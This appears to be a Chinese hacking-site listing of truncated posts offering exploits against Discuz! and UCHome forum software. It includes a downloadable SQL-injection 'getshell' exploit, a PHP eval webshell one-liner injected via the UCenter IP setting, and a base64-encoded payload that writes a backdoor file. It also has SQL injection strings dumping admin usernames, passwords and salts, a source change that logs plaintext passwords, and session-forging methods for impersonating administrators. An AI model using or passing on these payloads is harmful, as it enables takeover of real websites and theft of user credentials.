Discuz! 7.2 SQL注入exp getshell版
参数: 1.可直接getshell 2.爆管理账号密码 3.爆表前缀 如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。 下载地址:DZ7.2
参数: 1.可直接getshell 2.爆管理账号密码 3.爆表前缀 如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。 下载地址:DZ7.2
有管理员帐号及密码。 直接在UCenter IP 地址:里面插入一句话 xxoo\');eval($_POST[a])?>;// 就ok 然后菜刀连接https://www.webshell.cc/config/config_ucenter.php密码a , 测试通过
直都没找到DZ! 2.5后台拿shell的方法 一直等大牛暴出来 这次 暴了2个。 1.注册任意账户 2.登陆用户,发表blog日志(注意是日志) 3.添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}} 4.访问日志,论...
a',`subject`=(/*!select*/ concat(username,'|',password,'|',salt) from pre_ucenter_members where uid=1 limit 0,1),comment=' 再给出一些语句。 ',`subject`=(/*!select*/ group_concat(uid,':') from pre_common_membe...
地址:/source/function/function_connect.php
首先:第一次发帖,大牛请一笑而过 其次:这是通过简单修改DZ源文件,利用密码错误记录原理截取明文密码 呵呵,目的比较简单,不想跑那蛋疼的二次加密MD5,当然不是为了做坏事 目标文件:/source/class/class_member.php 先看错误密码记录部分,第200行左右 } else { $password = preg_replace("/^(.{".r...
这里只是说下方法,在要爆DZ 7.2 bbs的网站后面加上以下代码访问,即可爆出。"manyou/admincp.php?my_suffix=%0A%0DTOBY57",引号不算。 例如:https://www.webshell.cc/manyou/admincp.php?my_suffix=%0A%0DTOBY57
测试环境:discuz X1.5+nginx 1.0 漏洞文件source/function/function_core.php, 代码: $_G['setting']['domain']['app']['default'] && $content = preg_replace("/<a href=\"([^\"]+)\"/e", "rewriteoutput('site_d...
前面发的是UCHOME,为免有装B的嫌疑,干脆DISCUZ论坛的SESSION劫持方法也一并公布了。转载请保留原始URL,谢谢. DISCUZ X系列论坛的session和UCHOME不同,生成session使用的authkey不是程序的UCKEY,看看DZ的代码就了解啦: 1.浏览器类型和$_config['security']['authkey']加起来生成了一个全...
捂了N年的一个东西,今天公布了吧。 当通过DISCUZ系列程序的SQL注入漏洞,获得用户的HASH和ucenter的uckey后,其实是可以直接构造管理员的session的,然后在前台以管理员的身份做任何操作。 DISCUZ论坛验证了登录的IP和浏览器类型等,不过大家看看代码就会知道怎么绕了,而uchome弱一点,没有IP限制,我就拿uchome举例说说这个方法: 1.首先membe...